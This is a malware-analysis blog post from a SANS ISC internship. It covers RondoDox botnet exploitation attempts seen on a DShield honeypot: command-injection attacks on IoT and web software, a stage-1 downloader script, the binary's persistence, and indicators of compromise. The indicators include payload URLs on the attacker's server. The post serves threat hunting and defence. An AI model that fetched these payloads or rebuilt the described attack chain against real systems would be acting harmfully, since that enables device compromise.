Analyzing the Rondodox Botnet from a DShield Sensor
This post was written as part of my internship with SANS Internet Storm Center.
Through November 20 and November 21, 2025, automated vulnerability scanning was identified against the DShield Honeypot from 192[.]159[.]99[.]95 with the goal of gaining remote code execution against potential victims. These probing and scanning activities stood out as interesting as some POST requests were observed attempting to pull down a stage to execute code on the system from a second server (74[.]194[.]191[.]52). A shell script that would have been executed on the system was successfully recovered, and the second stage x86 binary that would be executed on the system.
Three key identifiers can be used for threat hunting:
- “rondo” plus 3 random letters plus a file extension, which can be matched with this RegEx:
rondo.[a-z]{3}.sh - The user agent “[email protected]” was observed in 13 HTTP request
- The user agent “[email protected]” was observed in the remaining 108 HTTP requests
IP Address Analysis and Reputation
Two IP Addresses were identified during analysis of this probing and exploitation attempt, 192.159.99.95 and 74.194.191.52.
192.159.99.95 -
Overall, this IP Address was found to be known for malicious exploitation attempts against various hosts. The ASN attributed to the hosting provider is known as “1337 Services”, the same hosting provider used to host the darkweb forum “cracked[.]to”. In addition, the cloud compute provider owning the IP Address is a “Privacy Focused Hosting Provider”, likely a “Bulletproof hosting provider”. Various clear-web sources indicate that 1337 Services, and rdp.sh, may have been linked to notorious e-crime threat actors. Brian Krebs reported on a takedown back in February, 2025 related to this cloud compute provider, being attributed to e-crime.
![[Pasted image 20260123010526.png]](https://blog.spookysec.net/img/Pasted image 20260123010526.png)
![[Pasted image 20260123010608.png]](https://blog.spookysec.net/img/Pasted image 20260123010608.png)
74.194.191.52 –
This IP Address was flagged a bit higher in terms of maliciousness as it’s primarily used for the second stage to establish C2. Any malware extracted from honeypots would point to this server.
![[Pasted image 20260123010554.png]](https://blog.spookysec.net/img/Pasted image 20260123010554.png)
Exploitation
This threat actor is known for exploiting a whole suite of vulnerabilities, with over 120 HTTP requests seen in the DShield web logs. For the sake of saving a lot of reading, and analysis work, a handful (5) exploits are going to be selected to perform analysis on, as some open-source intelligence feeds indicate over 75+ exploits identified.
Remote Code Execution on Hi3520 DVR –
On the topic of IoT remote code execution, one vulnerability appears to occur in the Hi3520 DVR that allows for remote code execution via a command injection vulnerability in a parsing engine on an NTP server configuration set/update:
There doesn’t appear to be a specific CVE directly tied to this product, which makes it of interest.
Remote code Execution on Unknown IP Camera –
The next vulnerability appears to be another Remote Code Execution vulnerability by a command injection in another NTP Server update functionality. A POST request is sent to the /apply.cgi page, with a body of the configuration. Within the c64_Ntp_Server update, it appears possible to inject a command using a standard $(cmdhere) to invoke a custom command to be executed.
The threat actor reaches out to their attacker server to pull down their stage 1 bash script. Interestingly enough, code to exploit this vulnerability was found on GitHub, and can be found in the references section below.
D-Link NAS Remote Code Execution –
CVE-2018-25120 states that a command injection vulnerability exists within the /goform/Mail_Test web endpoint. RondoDox was observed attempting to exploit this vulnerability by crafting a POST request that contained a classic command injection in the f_smtpserver field.
XWiki SolrSearch Remote Code Execution –
CVE-2025-24893 is a vulnerability that allows for Remote Code Execution via Server-Side Template Injection. This vulnerability was attempted to be exploited via a GET request to pull down the payload via wget and curl.
PHPFusion 9.03.50 Downloads.php Remote Code Execution –
Lastly, CVE-2020-24949 was observed to have been attempted to have been exploited. This vulnerability is a Remote Code Execution that allows for system commands to be executed by passing arguments into the cat_id parameter. The attacker passed (or evaluated) a system command to wget a payload and pipe it directly into the shell interpreter.
References:
https://itnext.io/rondodox-v2-evolution-of-rondodox-botnet-with-650-more-exploits-b16427b17aea
https://github.com/Rdthaiphno064/scan1/blob/8e91460efcc86acfba426735639ac8cd204014c1/a.go#L6383
https://www.vulncheck.com/advisories/dlink-dns343-sharecenter-command-injection-via-goform-mail-test
https://www.offsec.com/blog/cve-2025-24893/
https://www.exploit-db.com/exploits/49911
Post-Exploitation
Stage 1 –
After the initial command execution, the attacker pulls down a script named rondo.[a-z]{3}.sh, this file will then do several things, going line by line -
Lines 1-10 redirect Standard Output to /dev/null and not print it on the screen, disable AppArmor and SELinux, attempting to evade system defenses. Afterwards, it remounts the filesystems as read/write. Often found in IoT devices, filesystems will only be mounted as Read Only. Ager, it finishes up by clearing cache and changes the directory to /dev/.
Lines 11-28 do a write and cleanup task writing and removing various files to ensure the filesystem remount actually has the write permissions needed. It in short writes a hidden file named “t” that will not display in standard ls output. Only in ls -la. After write ability is confirmed, the file is then removed. This could also be remnants of another backdoor from previous campaigns.
After this job is finished, a new folder is made in /dev/ named /lib/. Afterwards, the lib folder is granted User Read+Write+Execute privileges, while Groups and Other is granted Read/Write privileges. The Rondo backdoor is attempted to be cleaned up.
Next is the downloader for the second stage, where the threat actor attempts to get the second stage from http://74[.]194[.]191[.]52/rondo.arch. This is done via 3 different means, wget, curl, and busybox’s wget (in case of embedded devices). It also renames the binary to “rondo” by simply catting the file and redirecting the output back out to the file.
Afterwards, it attempts to kill the task, in case it’s already running and attempts to run the rondo backdoor with the flags of “phpunit.x86_64”.
This continues for approximately 100 lines for different processor architectures, then lastly clears the bash history and exits.
Stage 2 –
The second stage received depends on the processor architecture of the system, for the sake of easy analysis x86 will be observed.
Attempting to run the binary in a malware analysis sandbox solution such as VirusTotal and Tria.ge yields negative results while running. No egress network connectivity was observed, indicating that there may be anti-analysis and anti-debugging features built into the binary.
Static analysis reveals several interesting persistence methods, one via a service, which can be found at \x00\x41\x71\xd8
Another being a crontab scheduled to be executed as root on reboot at \x00\x41\x74\x6e:
Several HTTP request bodies can be found within the code itself, indicating potential beaconing:
Lastly, an embedded string of rondo2012@atomicmail[.]io can be found as well:
![[Pasted image 20260123010803.png]](https://blog.spookysec.net/img/Pasted image 20260123010803.png)
Indicators of Compromise
Hashes:
rondo.arc700 - 0a7566c394304c6d66dd3fbb0325df46
rondo.arc700 - 9433ef04e4df73c53bc8f348a2438f001e11b1ee2b66242aa103d04cc420eb16
rondo.armv4l - bde540c89a4e7909f83eb61d7e7a2c27cc4aa4b884a5900fb2fecb01943e1efb
rondo.armv4l - f44aa3a26b623524e964d949aead0770
rondo.armv5l - ebf486fe6c414c90a07e70965975b3e1
rondo.armv5l - f7b1133f43b979a4078a0bea1c6fa2dc55ffc2c3d16c27efd8396de718faac90
rondo.armv6l - a98bfcdb02411b8fd9fe043d93284e1059c6e01899565ac19a3bc3d3af76e50e
rondo.armv6l - f2d7d9ca5102a931351abe8d496242e1
rondo.armv7l - 423310157565551db0ba7cb7da3bc5390668fb5fd1268e1351e8f109fd10ca1e
rondo.armv7l - ec9f332020f655f82c2e24d034bcefea
rondo.i486 - 450b9578b8b509f63eaaf34a8a261fcda29a765b2df906cec28ccafdeed67c49
rondo.i486 - 4dcd664e771fac634f7ff4a9136ad03f
rondo.i586 - e322fc880b7205d18091a6a4e55d1f793bc372b268d85ea84be086fd821fb285
rondo.i586 - e4897a4634885d66ac397d1b78f4ea27
rondo.i686 - 1f56a4dd15ae132338f9c52492dd664e
rondo.i686 - d804a964d48bc4822cce2b94dc1f1744f81a03fd52f78367e0ce620183558959
rondo.m68k - 2863b5713bcb12284f4dad48480bc9e9
rondo.m68k - a50a4958392143a72b56b991dca08aaffdc7ddd3264d64fd3a36a26e7bdac574
rondo.mips - a2bd389af21cac81c70b3aa85133ce976e60829018b0ba5eb61bf8baaa07a632
rondo.mips - b63495312c1c3adb17ae310aa3c74441
rondo.mipsel - 0d77bc60649bd9e637632d70f0620de5
rondo.mipsel - bcb01ea8deb081249865d0ead2b2a28ee68845f48f24cc3b1cbaa423060ce341
rondo.powerpc - 2d0d1fb726df86e500bf722406aaac29
rondo.powerpc - 508446376050d3ee2f241039a1595474039faa23eb9ea1bb6b5557b463d2b315
rondo.powerpc-440fp - 38b88098c93369c7c503ea071bfad2d93c586ce29aeefdac8beabf4a7755fce3
rondo.powerpc-440fp - cf0c37e981b9a22e25ea1d46a33ad7ee
rondo.sh4 - 1ead7087a3c805b3633675ac3bfa8d71d55dd390ebc1cfee27f534d310c9623c
rondo.sh4 - c84cb6e9e9eaab72a8325c900757488e
rondo.sparc - 6db276435ac02147578ce719858411be03ee51fa812475c70603932990c78284
rondo.sparc - d10a14957aa552689e93fde53f12d9ab
rondo.x86_64 - 8e4cf56ddc2cecc64131f1344f2c7abe
rondo.x86_64 - 9702bc9142be39fceec67f2345b36cedaba6ead824ac6a55134c963e59d4ad4c
rondo.dtm.sh - b951c731fc42ad0d4f6d785a01c4bfeb
rondo.dtm.sh - c178b1b59e61f9bfb9393d5ae7b77488fda3e9f0117a7f4dfe999db6cc6f8cbc
rondo.qre.sh - 2f29b67ce81b4b29a56d4efbe75c292b6c11a7caaf44cc22fdf0430b490129c9
rondo.qre.sh - eca30ff67b2180222c64eb7d67dabf05
IP Addresses:
192.159.99.95
74.194.191.52
URLs:
http://74.194.191.52/rondo.dtm.sh
http://74.194.191.52/rondo.xcw.sh
http://74.194.191.52/rondo.cgc.sh
http://74.194.191.52/rondo.tkg.sh
http://74.194.191.52/rondo.ebj.sh
http://74.194.191.52/rondo.dgx.sh
http://74.194.191.52/rondo.x86_64
http://74.194.191.52/rondo.mipsel
http://74.194.191.52/rondo.mips
http://74.194.191.52/rondo.armv6l
http://74.194.191.52/rondo.armv5l
http://74.194.191.52/rondo.armv4l
http://74.194.191.52/rondo.armv7l
http://74.194.191.52/rondo.powerpc
http://74.194.191.52/rondo.powerpc-440fp
http://74.194.191.52/rondo.i686
http://74.194.191.52/rondo.i586
http://74.194.191.52/rondo.i486
http://74.194.191.52/rondo.arc700
http://74.194.191.52/rondo.sh4
http://74.194.191.52/rondo.sparc
http://74.194.191.52/rondo.m68k
User Agents:
“Mozilla/5.0 ([email protected])”
“Mozilla/5.0 ([email protected])”
“Mozilla/5.0 (iPhone; CPU iPhone OS 18_5 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.5 Mobile/15E148 Safari/604.1”
rondo
RegEx:
(http|https)://[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}.[0-9]{1,3}/rondo.[a-z]{3}.sh – URL Extraction
rondo.[a-z]{3}.sh
References
- https://isc.sans.edu/ipinfo/192.159.99.95
- https://www.virustotal.com/gui/ip-address/192.159.99.95/detection
- https://check.spamhaus.org/results/?query=192.159.99.95
- https://isc.sans.edu/ipinfo/74.194.191.52
- https://www.virustotal.com/gui/ip-address/74.194.191.52/detection
- https://check.spamhaus.org/results?query=74.194.191.52
- https://itnext.io/rondodox-v2-evolution-of-rondodox-botnet-with-650-more-exploits-b16427b17aea
- https://github.com/Rdthaiphno064/scan1/blob/8e91460efcc86acfba426735639ac8cd204014c1/a.go#L6383
- https://www.vulncheck.com/advisories/dlink-dns343-sharecenter-command-injection-via-goform-mail-test
- https://www.offsec.com/blog/cve-2025-24893/
- https://www.exploit-db.com/exploits/49911
- https://www.trendmicro.com/en_us/research/25/j/rondodox.html
- https://www.trendmicro.com/en_us/research/25/j/rondodox.html
- https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
- https://www.f5.com/labs/articles/tracking-rondodox-malware-exploiting-many-iot-vulnerabilities
Comments